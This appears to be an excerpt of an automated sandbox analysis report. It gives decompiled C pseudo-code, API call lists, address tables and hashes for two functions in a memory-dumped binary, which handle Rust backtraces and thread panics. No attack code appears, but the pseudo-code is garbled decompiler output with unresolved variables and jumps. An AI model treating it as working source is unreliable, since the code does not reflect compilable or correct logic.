                          Uniqueness Score: -1.00%

                          Function 6ECDE690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6ECDE690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6ECE3BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6ed2adc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6ed2adc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6ed2add0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6ed2ae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6ed2add4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6ed2add8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6ed2addc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6ed2ae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6ed2add0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6ECF6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ed1dcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6ed2addc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6ed2add0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6ECF6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ed1dc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6ed2add8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6ECF6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ed1dc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6ECDE880(_v36);
								} else {
									_t38 = _t30;
									 *0x6ed2add4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6ed2add0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}






















                          0x6ecde690
                          0x6ecde694
                          0x6ecde699
                          0x6ecde69c
                          0x6ecde6a3
                          0x6ecde6b4
                          0x6ecde6b7
                          0x6ecde6bd
                          0x6ecde6c5
                          0x6ecde7a5
                          0x6ecde7aa
                          0x6ecde7ac
                          0x6ecde7d0
                          0x00000000
                          0x6ecde7ae
                          0x6ecde7ae
                          0x6ecde7b0
                          0x6ecde7b2
                          0x6ecde7ba
                          0x6ecde7c3
                          0x6ecde7c9
                          0x6ecde7c9
                          0x00000000
                          0x6ecde7ba
                          0x6ecde6cb
                          0x6ecde6cb
                          0x6ecde6d0
                          0x6ecde6d5
                          0x6ecde6dc
                          0x6ecde6f5
                          0x6ecde6f5
                          0x6ecde6fe
                          0x00000000
                          0x6ecde704
                          0x6ecde704
                          0x6ecde70c
                          0x6ecde729
                          0x6ecde729
                          0x6ecde72b
                          0x6ecde731
                          0x6ecde735
                          0x6ecde757
                          0x6ecde75b
                          0x6ecde75d
                          0x6ecde765
                          0x6ecde787
                          0x6ecde787
                          0x6ecde791
                          0x6ecde793
                          0x00000000
                          0x6ecde767
                          0x6ecde772
                          0x6ecde77a
                          0x6ecde83d
                          0x6ecde840
                          0x6ecde856
                          0x00000000
                          0x6ecde780
                          0x6ecde780
                          0x6ecde782
                          0x00000000
                          0x6ecde782
                          0x6ecde77a
                          0x6ecde737
                          0x6ecde742
                          0x6ecde74a
                          0x6ecde81a
                          0x6ecde81d
                          0x6ecde833
                          0x00000000
                          0x6ecde750
                          0x6ecde750
                          0x6ecde752
                          0x00000000
                          0x6ecde752
                          0x6ecde74a
                          0x6ecde70e
                          0x6ecde714
                          0x6ecde71c
                          0x6ecde7f7
                          0x6ecde7fa
                          0x6ecde810
                          0x6ecde85e
                          0x6ecde85e
                          0x6ecde864
                          0x6ecde873
                          0x6ecde722
                          0x6ecde722
                          0x6ecde724
                          0x00000000
                          0x6ecde724
                          0x6ecde71c
                          0x6ecde70c
                          0x6ecde6de
                          0x6ecde6e3
                          0x6ecde6ea
                          0x6ecde6ef
                          0x6ecde7d8
                          0x6ecde7dd
                          0x6ecde7e2
                          0x6ecde7e7
                          0x6ecde7f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde6ef
                          0x6ecde6dc

                          APIs
                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE6D0
                          • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE6E3
                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6ECDE714
                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6ECDE742
                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6ECDE772
                          • GetCurrentProcess.KERNEL32 ref: 6ECDE787
                          • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE7A5
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE7C3
                            • Part of subcall function 6ECDE880: ReleaseMutex.KERNEL32(?,6ECDE5F8), ref: 6ECDE881
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                          • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                          • API String ID: 1067696788-3213342004
                          • Opcode ID: 6cebd81d95a18661772f6932df0c52ebb649f1c234aa3c198c764a5dbf6aac3c
                          • Instruction ID: 7a9a714a8b04e17f362c45bcbc44dea06012d640b4e4fef9e4149da48459c0ac
                          • Opcode Fuzzy Hash: 6cebd81d95a18661772f6932df0c52ebb649f1c234aa3c198c764a5dbf6aac3c
                          • Instruction Fuzzy Hash: 71412672E04B419FEF509FE5DE5479AB7BAEB45315F010438E606A7384F736880AC7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC890, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6ECDC890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6ECE3B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ed1d9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6ed2adc0], esi");
				_t193 = E6ECDD1B0(_t268, 0x6ed1d9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6ECF6EE0(_t268,  &M6ED1D0E7, 0x46, _t349,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed1cd60;
						_v120 = 0x6ed1d014;
						_v68 = 0x6ed1da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECD2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6ECDD2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6ed2adc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6ed2adc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ed1da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed1cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6ECDD2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6ed2adbc);
					_v144 = 0x6ed2adbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6ECDD1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6ed2adb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6ECDD530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6ECF6EE0(_t268,  &M6ED1D0E7, 0x46, _t352,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6ed2a044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6ed2a044;
							_t205 = E6ECE2B10(_t268, 0x6ed2a044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6ed2a044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6ed2a044;
								_t206 = E6ECE2B10(_t268, 0x6ed2a044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6ed2adc8; // 0x760000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6ed2a044;
										_t340 = _t208;
										_t209 =  *0x6ed2a044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6ECE2B10(_t268, 0x6ed2a044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6ECF6C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6ed2adc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6ed2adb0;
											 *0x6ed2adb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ece3440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6ed2adc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6ECDC800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6ECF6EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6ed1d050, 0x6ed1d720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6ECDC690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6ECDC800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ed1d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ecdde50;
										_v60 =  &_v100;
										_v56 = 0x6ecdde50;
										_v52 =  &_v148;
										_v48 = E6ECDDE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECDD2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t248);
											}
											HeapFree( *0x6ed2adc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed2adac);
											_v68 = 0x6ed1d2c0;
											_v64 = 1;
											_v152 = 0x6ed2adac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECDDEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6ECDD2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed2adac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6ECDC800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6ECDDC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed2adbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed1cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6ECDD2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6ECDD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6ECDD440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6ed2a040 = 0;
											_t368 =  *0x6ed2a040;
											if( *0x6ed2a040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ed1d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed1cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6ECDD2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t238);
											}
											HeapFree( *0x6ed2adc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

































































































                          0x6ecdc897
                          0x6ecdc89a
                          0x6ecdc89e
                          0x6ecdc8a5
                          0x6ecdc8a6
                          0x6ecdc8a8
                          0x6ecdc8ad
                          0x6ecdc8b0
                          0x6ecdc8b2
                          0x6ecdc8b3
                          0x6ecdc8b4
                          0x6ecdc8b5
                          0x6ecdc8b6
                          0x6ecdc8b7
                          0x6ecdc8b8
                          0x6ecdc8b9
                          0x6ecdc8ba
                          0x6ecdc8bb
                          0x6ecdc8bc
                          0x6ecdc8bd
                          0x6ecdc8be
                          0x6ecdc8bf
                          0x6ecdc8c6
                          0x6ecdc8cc
                          0x6ecdc8cf
                          0x6ecdc8d6
                          0x6ecdc8dd
                          0x6ecdc8e2
                          0x6ecdc8e7
                          0x6ecdc8f0
                          0x6ecdc8f3
                          0x6ecdc8f9
                          0x6ecdc901
                          0x6ecdc906
                          0x6ecdc908
                          0x6ecdc922
                          0x6ecdc927
                          0x6ecdc92a
                          0x6ecdc92a
                          0x6ecdc92e
                          0x6ecdc931
                          0x6ecdc934
                          0x6ecdc936
                          0x6ecdc9aa
                          0x6ecdc9ad
                          0x6ecdca0a
                          0x6ecdca11
                          0x6ecdca1b
                          0x6ecdca22
                          0x6ecdca29
                          0x6ecdca2d
                          0x6ecdca34
                          0x6ecdca3b
                          0x6ecdca41
                          0x6ecdca44
                          0x6ecdca47
                          0x6ecdca4d
                          0x6ecdca54
                          0x6ecdca57
                          0x6ecdca5e
                          0x6ecdca63
                          0x6ecdca65
                          0x6ecdca6c
                          0x6ecdca74
                          0x6ecdca77
                          0x6ecdca79
                          0x6ecdca7c
                          0x6ecdca7c
                          0x6ecdca7f
                          0x6ecdca82
                          0x6ecdca86
                          0x6ecdca9c
                          0x6ecdca9c
                          0x6ecdcaaa
                          0x6ecdcaaa
                          0x00000000
                          0x6ecdca65
                          0x6ecdc9b2
                          0x6ecdc9b5
                          0x6ecdc9bc
                          0x6ecdc9c3
                          0x6ecdc9ca
                          0x6ecdc9d1
                          0x6ecdc9d5
                          0x6ecdc9dc
                          0x6ecdc9e3
                          0x6ecdc9e8
                          0x6ecdc9ea
                          0x00000000
                          0x6ecdc9f0
                          0x6ecdc9f5
                          0x6ecdc9fd
                          0x6ecdca00
                          0x6ecdca02
                          0x00000000
                          0x6ecdca02
                          0x6ecdc93d
                          0x6ecdc93d
                          0x6ecdc945
                          0x6ecdc94b
                          0x6ecdc955
                          0x6ecdc95c
                          0x6ecdc963
                          0x6ecdc969
                          0x6ecdc96c
                          0x6ecdc96f
                          0x6ecdc972
                          0x6ecdc975
                          0x6ecdc97a
                          0x6ecdc97d
                          0x6ecdc97f
                          0x6ecdcab3
                          0x6ecdcab3
                          0x6ecdcab6
                          0x6ecdcab8
                          0x6ecdcb8b
                          0x6ecdcb90
                          0x6ecdcb93
                          0x6ecdcb96
                          0x6ecdcd97
                          0x00000000
                          0x6ecdcd97
                          0x6ecdcb9c
                          0x6ecdcb9f
                          0x6ecdcd90
                          0x00000000
                          0x6ecdcd90
                          0x6ecdcba5
                          0x6ecdcba7
                          0x00000000
                          0x00000000
                          0x6ecdcbb0
                          0x6ecdcbb5
                          0x6ecdcbb8
                          0x6ecdcbbb
                          0x6ecdcbbd
                          0x00000000
                          0x00000000
                          0x6ecdcbc3
                          0x00000000
                          0x6ecdcbc3
                          0x6ecdcabe
                          0x00000000
                          0x6ecdc985
                          0x6ecdc99d
                          0x6ecdc9a2
                          0x6ecdcdbe
                          0x6ecdcdbe
                          0x6ecdcdc0
                          0x6ecdcdc0
                          0x6ecdcdc5
                          0x6ecdcaf3
                          0x6ecdcaf3
                          0x6ecdcaf6
                          0x6ecdcaf9
                          0x6ecdcb00
                          0x6ecdcb02
                          0x6ecdcb07
                          0x6ecdcb07
                          0x6ecdcb0d
                          0x6ecdcb16
                          0x6ecdcbf3
                          0x6ecdcbf3
                          0x6ecdcbf8
                          0x6ecdcbfa
                          0x6ecdcbfc
                          0x6ecdcc01
                          0x6ecdcc01
                          0x6ecdcc07
                          0x6ecdcc0d
                          0x6ecdcc0f
                          0x6ecdcdcf
                          0x6ecdcdd4
                          0x6ecdcdd6
                          0x6ecdcde6
                          0x6ecdcdeb
                          0x6ecdcdf0
                          0x6ecdcdf2
                          0x6ecdce32
                          0x6ecdce38
                          0x6ecdce3f
                          0x6ecdce41
                          0x6ecdce46
                          0x6ecdce48
                          0x6ecdce4f
                          0x6ecdce52
                          0x6ecdce57
                          0x6ecdce57
                          0x6ecdce5c
                          0x00000000
                          0x6ecdce5c
                          0x6ecdcdf4
                          0x6ecdcdfe
                          0x6ecdce03
                          0x6ecdce05
                          0x6ecdce05
                          0x6ecdce08
                          0x6ecdce0b
                          0x6ecdce0e
                          0x6ecdceb8
                          0x6ecdcebe
                          0x6ecdcec9
                          0x6ecdcec9
                          0x6ecdcece
                          0x6ecdcece
                          0x6ecdced0
                          0x6ecdced0
                          0x6ecdced2
                          0x6ecdcedd
                          0x6ecdcedd
                          0x6ecdcee2
                          0x6ecdcee2
                          0x6ecdceed
                          0x6ecdcef5
                          0x6ecdcef8
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcac1
                          0x6ecdcac1
                          0x6ecdcac7
                          0x6ecdcaca
                          0x6ecdcaca
                          0x6ecdcad0
                          0x6ecdcad3
                          0x6ecdcad5
                          0x6ecdcae3
                          0x6ecdcae3
                          0x6ecdcae5
                          0x6ecdcbcd
                          0x6ecdcbd0
                          0x6ecdcbde
                          0x6ecdcbe0
                          0x00000000
                          0x00000000
                          0x6ecdcbe6
                          0x6ecdcbe9
                          0x6ecdcbeb
                          0x00000000
                          0x6ecdcbeb
                          0x6ecdcaeb
                          0x6ecdcaee
                          0x6ecdcaf0
                          0x00000000
                          0x6ecdcaf0
                          0x6ecdcec0
                          0x6ecdcec2
                          0x00000000
                          0x6ecdcec2
                          0x6ecdce14
                          0x6ecdce17
                          0x00000000
                          0x00000000
                          0x6ecdce1d
                          0x6ecdce20
                          0x00000000
                          0x00000000
                          0x6ecdce26
                          0x6ecdce28
                          0x00000000
                          0x6ecdce28
                          0x6ecdcdd8
                          0x6ecdcddd
                          0x6ecdcddf
                          0x00000000
                          0x00000000
                          0x6ecdcde1
                          0x00000000
                          0x6ecdcc15
                          0x6ecdcc15
                          0x6ecdcc17
                          0x6ecdcc1a
                          0x6ecdce62
                          0x6ecdce62
                          0x6ecdce65
                          0x6ecdce68
                          0x6ecdce68
                          0x6ecdce6b
                          0x6ecdce71
